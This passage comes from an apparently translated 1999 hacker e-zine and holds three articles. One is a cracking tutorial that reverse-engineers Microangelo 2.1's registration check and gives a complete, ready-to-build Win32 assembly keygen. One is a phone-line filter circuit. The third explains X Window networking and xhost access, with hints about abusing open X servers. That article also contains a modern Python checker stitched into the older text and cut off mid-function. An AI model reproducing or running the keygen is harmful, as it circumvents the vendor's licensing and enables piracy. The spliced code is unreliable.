 remembers the address it has to show and reflects changes in real time, so
 by pressing F1 (after redefining it) we can cycle between 4 different
 places in memory that we want to watch, to see whether some call that we
 skipped over with F10 (step) has changed them.

 Checking the two addresses shows that the name is at 10008310 and the
 number at 10008180. We look at the code and see that the next instruction
 to be executed checks whether the first letter of the number is "P" (ASCII
 code #50), and a little further down whether it is "T" or "S". Since our
 number starts with neither "P" nor "T" or "S", if we just "step" (F10) to
 watch what happens, we reach the JUMP at address 1000292C, which is the
 so-called "jump bad_boy", because it jumps to where the program complains
 "Invalid registration information". We try some reg# with a "P" at the
 start, for example "P123456789". This time EBP becomes 1 and we jump to
 10002937:

   0137:10002937  XOR     EBX,EBX
   0137:10002939  PUSH    10008181                    ; addr(number) + 1
   0137:1000293E  CALL    100037E0          ; converts from string to number
   0137:10002943  ADD     ESP,04
   0137:10002946  MOV     [1000836C],EAX
   0137:1000294B  CMP     EBP,03
   0137:1000294E  JZ      1000295D
   0137:10002950  CDQ
   0137:10002951  MOV     ECX,0000000A
   0137:10002956  IDIV    ECX
   0137:10002958  MOV     [1000836C],EAX
   0137:1000295D  PUSH    10008180
   0137:10002962  MOV     EDI,[KERNEL32!lstrlen]
   0137:10002968  CALL    EDI
   0137:1000296A  MOVSX   EAX,BYTE PTR [EAX+1000817F]
   0137:10002971  SUB     EAX,30
   0137:10002974  PUSH    10008310
   0137:10002979  MOV     [10008174],EAX          ; saves the last digit
   0137:1000297E  CALL    EDI
   0137:10002980  CMP     EAX,06                  ; check of the length
   0137:10002983  JLE     10002A0D                ; of the name
   0137:10002989  CMP     EBP,01
   0137:1000298C  JNZ     10002997
   0137:1000298E  CALL    10002070
   0137:10002993  TEST    EAX,EAX
   0137:10002995  JNZ     100029B3
   0137:10002997  CMP     EBP,02
   0137:1000299A  JNZ     100029A5
   0137:1000299C  CALL    100021D0
   0137:100029A1  TEST    EAX,EAX
   0137:100029A3  JNZ     100029B3
   0137:100029A5  CMP     EBP,03
   0137:100029A8  JNZ     10002A0D
   0137:100029AA  CALL    10002320
   0137:100029AF  TEST    EAX,EAX
   0137:100029B1  JZ      10002A0D

 We see a call at 1000293E, which receives 10008181 as a parameter, that is
 our number without the first letter, the "P". The output of the function is
 stored in [1000836C], which ought to make us curious about what it is. In
 this case there is no need to go into the call to find out - it is enough
 to "step" over it and check the contents of EAX: "d eax" shows us nothing
 interesting, but "? eax" shows that in decimal the contents of eax is
 "123456789" - hahaha, very original, does it look familiar from somewhere?
 And what happens next? This number is saved in [1000836C], but if ebp is 3,
 then it is first divided by 0Ah and only then saved.

 When is ebp=3? Well, when the first letter of our number is "S". Further
 down the length of the entered name is checked (if it is less than or equal
 to 6 - we are out of luck), the last digit of the entered number is saved
 in [10008174] (first converted from ASCII to a number by subtracting 30)
 and the program branches 3 ways depending on whether ebp is 1, 2 or 3, i.e.
 whether the first letter of the reg# is "P", "T" or "S" respectively. 3
 different calls are made, which do different calculations and return a
 boolean - true if the number matches, or false if it doesn't.

 Just as an experiment we can step to 10002995, which we reach because we
 wrote "P" at the start of the number and so ebp=1, and we see that eax=0
 and the program is about to jump in the wrong direction, so, sitting right
 there at 10002995, we change the Zero flag with the command "rfl z", which
 we have prudently bound to the otherwise useless combination ALT+F1,
 because it is needed often. We let it run and what follows is "Thank
 you... bla bla", as if it were registered. Yes, except it isn't - if we
 exit and start it again, it greets us with a howl of "Invalid registration
 information detected in the installation" and starts up unregistered again.

 We seem to have "penetrated" quite deep, so it is time for the next step:

     Step 3: Analysis
     ----------------

 It could be patched so that some jumps always jump in one direction, but
 because of the three kinds of numbers it will be somewhat hard to make a
 universal patch such that the program accepts whatever you enter; besides,
 it would have to be patched in many places and would turn into a
 butchery... Something might break.

 So it looks easier to make a generator. To that end we will examine the
 call at address 1000298E: call 10002070 - we type "Phreedom" and
 "P123456789" again and step until we are on our call, then we press F8
 (trace) to go inside.

 There we are greeted by a horrifying sequence of instructions of the
 following kind: LEA EBP,[EBP*8+EBP] or LEA EBP,[EBP*2+EAX], which at first
 glance look as if some table in memory is being used heavily, a table whose
 contents and fill rule we have no way of knowing, but in fact that is not
 the case. This is the first time I have run into such a way of calculating,
 but it is a fact - the first instruction in effect multiplies EBP by 8 and
 puts the result in EBP, and the second multiplies EBP by 2, adds EAX to it
 and again puts the result in EBP.

     (Iron's note - this is actually a convenient way of fast
      multiplication, often used by experienced programmers. It is not
      hard, for example, to do a fast multiplication by 5 or 9, and even to
      add something else afterwards - LEA EAX,[EAX*8+EAX] for example,
      which performs a multiplication by 9, executes on a 486 in 1 or 2
      cycles (if EAX was changed in the previous instruction), while MUL
      takes a whole 13)

 Such repeated multiplications and additions are done with every letter of
 the name we entered, producing 6 sums in EDI, ECX, ESI, [ESP+10], [ESP+14]
 and EDX. Then everything is summed in EAX and divided, signed, by 987355h,
 the number found in [1000836C] (our reg#, converted from string to number)
 is subtracted from the remainder in EDX, and a check is made whether the
 result is 0FFFFDCD6h. If so - then the last digit of the serial number,
 which is kept in [10008174], is compared with a number passed as a
 parameter to the function we are in, the one with GetDlgItemTextA in it.

 That function, by the way, is that joker KnockKnock, and it is easy to
 verify that the different modules call it once each (in one place in their
 code) with different values of this parameter: MUEDIT - 2, MUENGNR - 7,
 MUMGR - 1. However, at the start of the calls that handle the "P" and "T"
 numbers, a check is made whether the last digit is 1, 2, 4 for "P" or 3,
 5, 6 for "T", and if it is not, it exits straight away with false without
 computing the sums or dividing by 987355h at all.

 Stranger still, when I made myself a number with "P" it turned out that it
 registers some of the program's modules and not others (for example the
 browser gets registered and the animator does not). Besides, nothing can
 be registered with a number starting with "T", because for it the last
 digit is required to be 3, 5 or 6, and no module calls KnockKnock with
 such a parameter.

 It turns out, however, that the "S" numbers work wonderfully - for them no
 check of the last digit is made. So we will make a generator for "S"
 numbers. We use the following scheme: we compute the sums, divide by
 987355h and subtract 0FFFFDCD6h from the remainder, convert the result to a
 string as a signed decimal number (we write the sign only if it is a minus)
 and, by putting an "S" in front, we get a valid registration number for the
 entered name.

     Step 4 The KeyGen
     -----------------

 At this stage we will have to steal a bit of code from MUAPP.DLL, so that
 we don't wear ourselves out trying to write it on our own. First we set a
 BPX at address 10002320, which we learn from "call 10002320" is the start
 of the procedure for the "S" numbers. Then we clear all other breakpoints,
 leave SoftIce and type "Phreedom" and "S123456789" into Microangelo, press
 OK and we are in. We are at 10002320, right at the start of the procedure;
 we page down a little (CTRL+PgDOWN) to see where it ends and establish
 that 120h bytes will be enough.

 On the command line we type "Pause OFF", so that the output does not stop
 when the page fills up, then "cls" to clear the junk out of the buffer, and
 "u 10002320 l 120" to dump the code into the SoftIce history buffer, which
 we then save to a LOG file with the Symbol Loader's "Save History to file"
 command. Before the "u" command we can do "code off" to hide the byte
 representation of the instructions in case it was switched on before -
 right now it would get in the way more than it would help.

 Now we open the saved file to look over our loot:

   0137:10002320  SUB     ESP,08
   0137:10002323  XOR     ECX,ECX
   0137:10002325  XOR     EDX,EDX
   0137:10002327  PUSH    EBX
   0137:10002328  PUSH    ESI
   0137:10002329  PUSH    EDI
   0137:1000232A  XOR     BX,BX
   0137:1000232D  PUSH    EBP
   0137:1000232E  XOR     ESI,ESI
   0137:10002330  XOR     EDI,EDI
   0137:10002332  MOV     [ESP+14],ESI                     ; must be hex
   0137:10002336  MOV     [ESP+10],ESI                     ; also hex
   0137:1000233A  MOV     DWORD PTR [10008364],00000001    ; not needed
   0137:10002344  MOVSX   EAX,BX
   0137:10002347  MOVSX   EAX,BYTE PTR [EAX+10008310]
   0137:1000234E  TEST    EAX,EAX
   0137:10002350  JZ      100023F5
   0137:10002356  INC     BX
   0137:10002358  LEA     EBP,[EAX*2+EAX]
   0137:1000235B  LEA     EBP,[EBP*4+EBP+00]
   0137:1000235F  SUB     EDI,EAX
   0137:10002361  SUB     ECX,EAX
   0137:10002363  SUB     EDX,EAX
   0137:10002365  LEA     EBP,[EBP*8+EAX]
   0137:10002368  SHL     EBP,03
   0137:1000236B  LEA     EBP,[EBP*8+EBP+00]
   0137:1000236F  LEA     EBP,[EBP*8+EAX]
   0137:10002372  ADD     ESI,EBP
   0137:10002374  LEA     EBP,[EAX*2+EAX]
   0137:10002377  LEA     EBP,[EBP*4+EBP+00]
   0137:1000237B  LEA     EBP,[EBP*8+EAX]
   0137:1000237E  LEA     EBP,[EBP*8+EAX]
   0137:10002381  SHL     EBP,03
   0137:10002384  LEA     EBP,[EBP*8+EBP+00]
   0137:10002388  ADD     ECX,EBP
   0137:1000238A  LEA     EBP,[EAX*8+EAX]
   0137:1000238D  LEA     EBP,[EBP*8+EBP+00]
   0137:10002391  LEA     EBP,[EBP*8+EBP+00]
   0137:10002395  SUB     EBP,EAX
   0137:10002397  LEA     EBP,[EBP*8+EAX]
   0137:1000239A  LEA     EBP,[EBP*2+EBP+00]
   0137:1000239E  LEA     EDX,[EBP*4+EDX]
   0137:100023A1  MOV     EBP,EAX
   0137:100023A3  SHL     EBP,05
   0137:100023A6  ADD     EBP,EAX
   0137:100023A8  ADD     EBP,EAX
   0137:100023AA  LEA     EBP,[EBP*8+EAX]
   0137:100023AD  LEA     EBP,[EBP*8+EAX]
   0137:100023B0  LEA     EBP,[EBP*4+EAX]
   0137:100023B3  LEA     EBP,[EBP*8+EAX]
   0137:100023B6  ADD     [ESP+14],EBP                     ; hex
   0137:100023BA  LEA     EBP,[EAX*8+EAX]
   0137:100023BD  LEA     EBP,[EBP*8+EAX]
   0137:100023C0  SHL     EBP,03
   0137:100023C3  SUB     EBP,EAX
   0137:100023C5  SHL     EBP,03
   0137:100023C8  LEA     EBP,[EBP*2+EBP+00]
   0137:100023CC  LEA     EBP,[EBP*4+EBP+00]
   0137:100023D0  ADD     EDI,EBP
   0137:100023D2  LEA     EBP,[EAX*8+EAX]
   0137:100023D5  LEA     EBP,[EBP*8+EBP+00]
   0137:100023D9  LEA     EBP,[EBP*8+EBP+00]
   0137:100023DD  LEA     EBP,[EBP*8+EAX]
   0137:100023E0  LEA     EBP,[EBP*2+EBP+00]
   0137:100023E4  LEA     EAX,[EBP*4+EAX]
   0137:100023E7  ADD     [ESP+10],EAX                          ; hex
   0137:100023EB  CMP     BX,2B                                 ; hex
   0137:100023EF  JL      10002344
   0137:100023F5  MOV     EAX,[ESP+10]                          ; hex
   0137:100023F9  ADD     EAX,EDI
   0137:100023FB  ADD     EAX,[ESP+14]                          ; hex
   0137:100023FF  ADD     EAX,EDX
   0137:10002401  ADD     EAX,ECX
   0137:10002403  MOV     ECX,00987355                          ; hex
   0137:10002408  ADD     EAX,ESI
   0137:1000240A  CDQ
   0137:1000240B  IDIV    ECX
   0137:1000240D  SUB     EDX,[1000836C]
   0137:10002413  CMP     EDX,FFFFDCD6                          ; hex
   0137:10002419  JNZ     10002432                              ; not needed
   0137:1000241B  MOV     EAX,00000001                          ; not needed
   0137:10002420  POP     EBP
   0137:10002421  MOV     DWORD PTR [10008364],00000000         ; not needed
   0137:1000242B  POP     EDI
   0137:1000242C  POP     ESI
   0137:1000242D  POP     EBX
   0137:1000242E  ADD     ESP,08
   0137:10002431  RET                        ; we don't need what follows

 Before we delete the addresses on the left, we have to fix up our jumps -
 only two are needed here (the first two, the third is "bad_boy"). We rename
 them to something descriptive or simply to @1 and @2 (we put the labels @1:
 and @2: where the jumps land, and change the jumps themselves to "jmp @x").

 Then we make some cosmetic changes so that the code can be compiled - we
 delete lines 1000233A and 10002419,1B,21 and look carefully at the numbers
 in order to put an "h" after every one > 9. Here those are 10, 14, 2B,
 00987355 and FFFFDCD6.

 Line 10002347 "MOVSX EAX,BYTE PTR [EAX+10008310]" has to become
 "MOVSX EAX, BYTE PTR buffer[EAX]", so that it points to the name we have
 entered (buffer is the variable where the name is stored), and line
 1000240D "SUB EDX,[1000836C]" has to become "SUB EDX,0FFFFDCD6h".

 Line 10002413, which we kept only in order to copy/paste the number
 FFFFDCD6 from it, now has to be replaced with something that prints the
 value in EDX on the screen in decimal; it depends on whether the generator
 will work under DOS or under Win. In this case it will be under Win, so we
 use the ready-made API "call wsprintf, offset codeb+1, offset formatstr,
 edx", not forgetting to clean up our stack afterwards with "add esp,12",
 because Win32.hlp says that the wsprintf function does not take care of
 that itself.

 The parameters are: codeb is a buffer where the formatted string is put
 (+1, because we have put an "S" at the start beforehand), formatstr is
 "%ld", which makes the function convert to "long decimal" the number given
 as the third parameter.

 Now we no longer need the addresses to the left of the code and can delete
 them. If you have DOS Navigator, you are downright lucky and can make use
 of its ability to work with blocks of text - press F5 to switch to block
 mode and select only the addresses, then CTRL+DEL and done. If you don't
 have DN, your arm will fall off from deleting line by line :)

 This whole thing will be a procedure in our keygen, so we make up a name
 for it (for example GenCode) and write "GenCode Proc" at the start and
 "GenCode endp" at the end.

 The body of the program is like that of any Win32 program, so I won't
 comment on it, but will only point out the changes that make our keygen
 work. We make ourselves an interface (with some resource editor or by hand
 with a text editor), which is a dialog with two text editboxes, for the
 name and for the number respectively. There is no need for buttons and
 menus, but if you want to make yourself an "About" menu to announce to the
 world who you are, you are free to do so; I don't consider it necessary.
 Here is a sample RC file:

 -------------------------------- makgen.rc ---------------------------------
   #define IDC_STATIC                                     -1
   #define IDC_EDIT1                                      3003
   #define IDC_EDIT2                                      3004

   MyCLASS DIALOGEX MOVEABLE IMPURE LOADONCALL DISCARDABLE  0, 0, 160, 90, 0
   STYLE DS_3DLOOK | WS_MINIMIZEBOX | WS_VISIBLE | WS_SYSMENU | DS_CENTER |
                     WS_POPUP
   CAPTION "Microangelo 2.1 CodeGen"
   CLASS "MyCLASS"
   FONT 8, "MS Sans Serif"
   BEGIN
       LTEXT           "Your Name:", IDC_STATIC,   11,10,40,8
       EDITTEXT        IDC_EDIT1,  11,25,99,12, ES_AUTOHSCROLL | ES_LEFT
       LTEXT           "Your code:", IDC_STATIC,   11,45,40,8
       EDITTEXT        IDC_EDIT2,  11,60,99,12, ES_AUTOHSCROLL | ES_LEFT
       GROUPBOX        "",IDC_STATIC,5,0,150,85
   END
 ----------------------------------------------------------------------------
 The idea is the following: we will watch for the EN_UPDATE message, which
 the editbox with the name sends to the dialog when someone changes the
 text in it, and if the text has become longer than 6 characters - we
 generate a reg# and send it to the other editbox. Here is the full source:
 ------------------------------ makgen.asm ----------------------------------
   .386P
   Locals
   jumps

   .Model Flat ,StdCall

   UNICODE = 0
   INCLUDE w32.inc

   .DATA

   wc              WNDCLASSEX              <0>
   msg             MSG                     <0>
   ClassName       db 'MyCLASS',0
   formatstr       db '%ld',0
   errstr          db 'Enter >6 chars for name',0
   codeb           db 'S', 11 dup(0)
   buffer          db 2Bh dup(?),0

   .Data?
   hInstance   HINSTANCE ?
   CommandLine LPSTR ?
   hDlg        HWND ?
   hEDIT1      HWND ?
   hEDIT2      HWND ?

   .const
   IDC_EDIT1 equ 3003
   IDC_EDIT2 equ 3004

   .CODE

   Start:
       call      GetModuleHandle, NULL
       mov       hInstance,eax
       call      GetCommandLine
       mov       CommandLine,eax
       call      WinMain, hInstance, NULL, CommandLine, SW_SHOWDEFAULT
       call      ExitProcess,eax

   WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, CmdLine:LPSTR, CmdShow:SDWORD

       mov  wc.wc_cbSize,WNDCLASSEX_
       mov  wc.wc_style, CS_HREDRAW or CS_VREDRAW
       mov  wc.wc_lpfnWndProc, OFFSET WndProc
       mov  wc.wc_cbClsExtra,NULL
       mov  wc.wc_cbWndExtra,DLGWINDOWEXTRA
       push hInstance
       pop  wc.wc_hInstance
       mov  wc.wc_hbrBackground,COLOR_BACKGROUND
       mov  wc.wc_lpszMenuName,NULL
       mov  wc.wc_lpszClassName,OFFSET ClassName
       call LoadIcon,hInstance,IDI_APPLICATION
       mov  wc.wc_hIcon,eax
       mov  wc.wc_hIconSm,eax
       call LoadCursor,NULL,IDC_ARROW
       mov  wc.wc_hCursor,eax
       call RegisterClassEx, offset wc
       call CreateDialogParam,hInstance,offset ClassName,NULL,NULL,NULL
       mov  hDlg,eax
       call ShowWindow, hDlg,SW_SHOWNORMAL
       call UpdateWindow, hDlg
       call GetDlgItem,hDlg,IDC_EDIT1
       mov  hEDIT1,eax
       call SetFocus,eax
       call GetDlgItem,hDlg,IDC_EDIT2
       mov  hEDIT2,eax
       .WHILE TRUE
         call GetMessage, offset msg,NULL,0,0
         .BREAK .IF (!eax)
         call IsDialogMessage, hDlg, offset msg
         .IF eax ==FALSE
            call TranslateMessage, offset msg
            call DispatchMessage, offset msg
         .ENDIF
      .ENDW
       mov eax,msg.ms_wParam
       ret
   WinMain endp

   WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
       mov   eax,uMsg
       .IF eax==WM_DESTROY
           call PostQuitMessage,NULL
           xor eax,eax
        .ELSEIF eax==WM_COMMAND
           mov eax,wParam
           .IF !(lParam==0)
             .IF ax==IDC_EDIT1
             shr eax,16
             .IF ax==EN_UPDATE
               call GetWindowText, hEDIT1, offset buffer, 2Bh
               .IF  eax > 6
                 call GenCode
                 call SetWindowText, hEDIT2, offset codeb
               .ELSE
                 call SetWindowText, hEDIT2, offset errstr
               .ENDIF
             .ENDIF
             .ENDIF
           .ENDIF
       .ELSE
          call DefWindowProc,hWnd,uMsg,wParam,lParam
       .ENDIF
       ret
   WndProc endp

   GenCode proc

        SUB     ESP,08
        XOR     ECX,ECX
        XOR     EDX,EDX
        PUSH    EBX
        PUSH    ESI
        PUSH    EDI
        XOR     BX,BX
        PUSH    EBP
        XOR     ESI,ESI
        XOR     EDI,EDI
        MOV     [ESP+14h],ESI
        MOV     [ESP+10h],ESI
   @1:  MOVSX   EAX,BX
        MOVSX   EAX,BYTE PTR buffer[eax]
        TEST    EAX,EAX
        JZ      @2
        INC     BX
        LEA     EBP,[EAX*2+EAX]
        LEA     EBP,[EBP*4+EBP+00]
        SUB     EDI,EAX
        SUB     ECX,EAX
        SUB     EDX,EAX
        LEA     EBP,[EBP*8+EAX]
        SHL     EBP,03
        LEA     EBP,[EBP*8+EBP+00]
        LEA     EBP,[EBP*8+EAX]
        ADD     ESI,EBP
        LEA     EBP,[EAX*2+EAX]
        LEA     EBP,[EBP*4+EBP+00]
        LEA     EBP,[EBP*8+EAX]
        LEA     EBP,[EBP*8+EAX]
        SHL     EBP,03
        LEA     EBP,[EBP*8+EBP+00]
        ADD     ECX,EBP
        LEA     EBP,[EAX*8+EAX]
        LEA     EBP,[EBP*8+EBP+00]
        LEA     EBP,[EBP*8+EBP+00]
        SUB     EBP,EAX
        LEA     EBP,[EBP*8+EAX]
        LEA     EBP,[EBP*2+EBP+00]
        LEA     EDX,[EBP*4+EDX]
        MOV     EBP,EAX
        SHL     EBP,05
        ADD     EBP,EAX
        ADD     EBP,EAX
        LEA     EBP,[EBP*8+EAX]
        LEA     EBP,[EBP*8+EAX]
        LEA     EBP,[EBP*4+EAX]
        LEA     EBP,[EBP*8+EAX]
        ADD     [ESP+14h],EBP
        LEA     EBP,[EAX*8+EAX]
        LEA     EBP,[EBP*8+EAX]
        SHL     EBP,03
        SUB     EBP,EAX
        SHL     EBP,03
        LEA     EBP,[EBP*2+EBP+00]
        LEA     EBP,[EBP*4+EBP+00]
        ADD     EDI,EBP
        LEA     EBP,[EAX*8+EAX]
        LEA     EBP,[EBP*8+EBP+00]
        LEA     EBP,[EBP*8+EBP+00]
        LEA     EBP,[EBP*8+EAX]
        LEA     EBP,[EBP*2+EBP+00]
        LEA     EAX,[EBP*4+EAX]
        ADD     [ESP+10h],EAX
        CMP     BX,2Bh
        JL      @1
   @2:  MOV     EAX,[ESP+10h]
        ADD     EAX,EDI
        ADD     EAX,[ESP+14h]
        ADD     EAX,EDX
        ADD     EAX,ECX
        MOV     ECX,00987355h
        ADD     EAX,ESI
        CDQ
        IDIV    ECX
        SUB     EDX,0FFFFDCD6h
        call    wsprintf, offset codeb+1, offset formatstr, edx
        add     esp,12
        POP     EBP
        POP     EDI
        POP     ESI
        POP     EBX
        ADD     ESP,08
        RET

   GenCode endp
   end Start
 ----------------------------------------------------------------------------

 The lazier among you can use this source as-is, changing only the contents
 of the GenCode procedure. You need the file w32.inc in order to compile
 successfully; I personally got it either from some source on Iczelion's
 page, which Solar Eclipse recommends to you in phm20, or from Stone's
 site:

                           http://207.30.50.126/

 Stone's site is not among the recommended ones, but that is where it
 belongs, in my opinion.

 To make even more fun of Microangelo, you can use it to steal whichever
 icon you like best from its EXEs and put it on the KeyGen; you can also
 pull out the bitmap image with the logo and put it as the background of
 the dialog, under the editboxes.

      That's it from me. Happy cracking. Have phun. ...
      For contacts and swearing - Phreedom MessageBoard.
                                                                    04.06.99

 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#12·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Increasing the Resistance of Phone Line                      Stoiko & 1/2
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

 A perfectly ordinary day. You are on the Internet, deep into some site.
 And at some point your connection dies and you hear a click. An unpleasant
 business, but what can you do, BTC has done its dirty work. What follows is
 a hearty round of swearing and then you dial again. And so on without end.
 But instead of wearing out our tongues with curses, why not help ourselves?
 Fine, but how? Why not connect to the modem a device that filters the
 interference and so ensures a stable connection and high speed! We will now
 look at one such small circuit. It serves to filter the unwanted
 interference on the telephone line. It is connected directly after the
 modem and is simple to build! Here it is:


   0-----------------------------------------------0
         |               |               |
      -------           ---            -----
      -------       R2  | |         C3 -----
   C1    |              | |              |
         |              ---              |
         |               |               |
         |             ------            |
         |      R1     ------ C2   R3    |
         |   _____       |       _____   |
   0--------|_____|-------------|_____|--------------0

   C1 - 0.1 microfarads
   C2 - 47 microfarads
   C3 - 0.1 microfarads
   R1 - 100 ohms
   R2 - 60 ohms
   R3 - 100 ohms

 It does not matter which of the two ends you connect to the modem - connect
 whichever you choose, and the other one to the telephone line. Resistor R2
 has a somewhat special significance. For me the circuit works well with a
 value of R2 = 60 ohms. But for you it may not work with that value, because
 of differences in the lines and in the modems. You can try different values
 of R2 from 40 to 70 ohms until you get an optimal setting.

 Let us assume you have built the circuit and are ready to try it. Before
 you connect it, check all the connections several times!!! If you have made
 a mistake somewhere in the wiring, IT CAN BURN OUT YOUR MODEM. So check
 several times. If, after the circuit is connected, the speed does not
 increase but does the opposite, you have to change R2, that is, reduce it.
 The larger it is, the more stable the connection, but at a lower speed. So
 tune it well!!! Now a few tips for a stable and fast connection:

 1. If the telephone line is used by both the modem and a telephone, the
 telephone must be connected to the modem at the socket marked PHONE.
 Connected this way, the telephone is disconnected from the line when you
 dial from the modem. Otherwise, whenever you use the modem the telephone
 will have a negative effect!

 2. Use twisted cable for the run from the line to your modem. Do NOT use
 solid-core cable, but stranded twisted cable. It is more resistant to
 interference and parasitically induced signals!!!

 3. If your telephone is some old model, there is a resistor at the socket
 the telephone plugs into. Remove it, but only if you have not connected the
 telephone to the modem, that is, to the PHONE input. In that case there is
 no point in removing it!!!

 4. It is a good idea to check all the connections along the line, so that
 your connection does not fall apart at the slightest wind.

   Good luck in the fight against bad lines!

 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#13·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  X Window Tips & Tricks                                      Spite Master
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

 I have noticed that Linux has lately been coming out of the Twilight Zone
 in Bulgaria and is starting to gain ever wider popularity, even among
 ordinary users. A whole string of magazines have taken turns offering CDs
 with Linux distributions, among them PC Magazine with GNU/Debian (slink)
 and Computer World with RedHat 6.0. And since the customers of these
 magazines come mostly from the M$ Windows contingent (called Woza for
 short), every man and his dog has rushed to install the graphical system
 X Window (also known as X), without realizing how radically different it is
 from Woza and how many dangers its improper use hides. So I decided to shed
 a little light on the matter. At first I meant to list the troubles that
 can befall you through improper use, and also how you can take advantage of
 them, but EXo said that was too "bare", so I decided to rewrite it
 completely. I strained myself, and here is what I came up with:

     1) What is X Window and where does it take root?

 The whole hysteria around X began quite a while ago, when people at MIT set
 about making a universal and portable graphical system for the Unix
 platforms. So the boys started writing, and wrote, and wrote (and in the
 end they crapped themselves, but that is a topic for another conversation)
 and arrived at the idea of the so-called X/Open Transport Protocol. And
 since, for most of you who have dealt with networks, the words Transport
 Protocol presumably mean only one thing - a network connection - I will say
 it: yes, X is a networked graphical system. This is exactly where the
 "insignificant" difference from Woza shows up. X uses the client/server
 concept, which means that the application programs and the graphical
 environment itself are separated from each other by a transport layer,
 implemented in one of two ways: shared memory or sockets. Do you see the
 difference from Woza? No DLLs, no far calls.

 Several interesting and useful features of X follow from this: one X server
 (a machine with a graphics card, lots of RAM and a powerful network
 connection) can serve several machines on a network, with the programs
 running on those machines while the windows themselves appear on the screen
 of the X server. This in turn is the reason a terribly sucker-grade method
 for "remote root" exists. The separate address spaces also make it
 impossible to create hooks, and X has none. Well, there is something
 similar, but it works on a completely different principle; it is something
 like the WH_CALLWNDPROC hook, but with an event filter, and the analogy is
 not complete.

 So, X has many varieties, free and commercial, and almost every
 self-respecting OS has an X server and libraries for the X protocol (I want
 to stress that Woza does not support X, whereas DEC, VMS and a few other
 exotic OSes have it as standard). At the moment the most widespread among
 Linux distributions is the free XFree86, but some commercial distributions
 offer other kinds as well. The worst thing about XFree86 is that it does
 not support a shared memory implementation of its protocol, which limits
 the number of pixels per second when drawing raster graphics and lowers the
 fps of the MPEG player, since the Linux network subsystem is limited in
 speed. Also, you cannot simply hand X a pointer to a structure in memory
 and have it do something with it; you have to send it the whole thing. X
 has a disgusting stream protocol, which is described in the RFC.

 Naturally, nobody in their right mind writes programs that open a socket to
 the server and start talking to it directly! The library libX11 (or Xlib)
 was built for that purpose. X11 comes from the name of the protocol: X11R6,
 i.e. X v11, revision 6, which is the most widespread at the moment (there
 are R1-R5, but as you can guess, compared to R6 they are something like a
 Lada compared to a Mazda - both are cars, both move, but the Mazda is 2x
 faster). Xlib provides an API that is very different from the one in Woza
 (I know of a WinAPI implementation for X, but everyone spits on it) and
 which gives you access to the most basic components: fonts, colors and
 palettes, input devices (not only mice, but also tablets, pens, digitizers
 - all with one API), bitmaps and pixmaps (b&w and color images),
 rectangular regions of the screen and graphics primitives. And that is the
 foundation of X! Nothing more. No buttons, no windows, no scrollers, no
 timers, nothing! If you do not want to write your own buttons, you use some
 GUI library implemented on top of Xlib; if you want windows, you will need
 a WM (Window Manager) to draw them for you; if you want timers, write them
 yourself! That is where the main problem of X comes from: the lack of a
 unified interface like the one in Woza. Once upon a time MIT wrote a
 library, libXaw (Athena Widgets), but it was for b&w displays and is
 disgusting (at least compared to how a Mac looks in b&w).

 Later Athena evolved into Motif, which however costs an arm and a leg, to
 say nothing of what it costs if you want to develop on it. Many commercial
 Unixes now use Motif, among them Solaris, Irix and SCO. SunOS, in order to
 be different from the rest, uses OpenLook, which has absolutely nothing in
 common with any GUI you have ever seen (e.g. instead of boxes for input
 there are lines, as if you were writing in a first-grader's notebook). But
 I have strayed rather far from the main idea. I think it is now time to
 show you what X can do and how they can ..... you (with the help of X)

     2) Screwing with your X server

 As I already said, the programs and X are separated by a network layer, and
 the output of a program can be redirected to an arbitrary X server that
 allows us to connect to it. "Redirected" is not the most suitable word,
 since the fact that you see the windows on your own machine simply means
 that Xlib has been instructed to connect to /tmp/.X11-unix/X0 (Unix domain
 socket) or localhost:0.0 (TCP socket). I am not going to explain what a
 Unix domain socket is, read the info. I will only tell you that it is a
 socket that brazenly exists as a file (instead of an IP it has an inode).
 You cannot open it as an ordinary file, but you can with socket(AF_UNIX,
 ...). Oh, why am I bothering to digest the information for you, go and read
 Info. Go to Libc:, Sockets:: and read. But how does Xlib know which server
 to connect to? Very simple: there is the environment for that purpose, and
 a variable DISPLAY. On isolated systems, where X and the programs are on
 one and the same machine, DISPLAY=:0.0. The format is
 DISPLAY=<host>:<display>.<screen>, and if <host>==NULL, this is a local
 connection (through shared memory or a Unix domain socket); otherwise it
 contains the hostname or IP of the X server. <display> is the number of the
 display that X supports.

 Have you heard that there are computers with more than one screen? No!?
 Well, now you know that X supports them without any problem. While
 <display> can be a whole set of screens, each individual screen has its own
 number <screen>. So, on your PC or Alpha you have only one screen, and then
 0.0 does the job perfectly. X usually sits on port 6000+<display>; a
 netstat would show it to you. Now, if you want to run your programs on
 Pesho's screen, you simply set DISPLAY=pesho.phreedom.org:0.0 and you are
 done! With one small detail: most likely you will get an error message from
 Xlib saying that it cannot open the display because of "connection
 refused". Aha, so that is how it is! X does not let just anyone connect to
 it, much as you do not sleep with everyone who offers. Well, people thought
 of that and made the command `xhost'. You type something like `xhost +host'
 or `xhost -host' and host now has|no longer has access to your X server.
 There are also short versions, `xhost +' and `xhost -', which operate on
 all IPs. When you type `xhost +' you get in reply something to the effect
 that access control has been disabled and anyone can connect. With the
 minus exactly the opposite happens. If you want local connections only, you
 have to type 'xhost +local:'. And if you want to forbid TCP altogether as a
 protocol for X, you will have to start it with the option `-nolisten tcp'.
 What can they do to you if you mistakenly allow some nasty character to
 connect to your server?
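
 The settings described above can be checked mechanically. The following is
 an added example in Python, not part of the original article: it parses a
 DISPLAY value, the text printed by a bare `xhost', and an X server command
 line, and reports the exposures the article names. The function names, the
 sample strings (constructed) and the `-ac' check are assumptions of this
 example.

```python
import shlex

X_TCP_BASE = 6000  # from the article: X listens on port 6000+<display>


def parse_display(value):
    """Split <host>:<display>.<screen>; an empty host means a local connection."""
    host, sep, rest = value.rpartition(":")
    if not sep:
        raise ValueError("DISPLAY must contain ':'")
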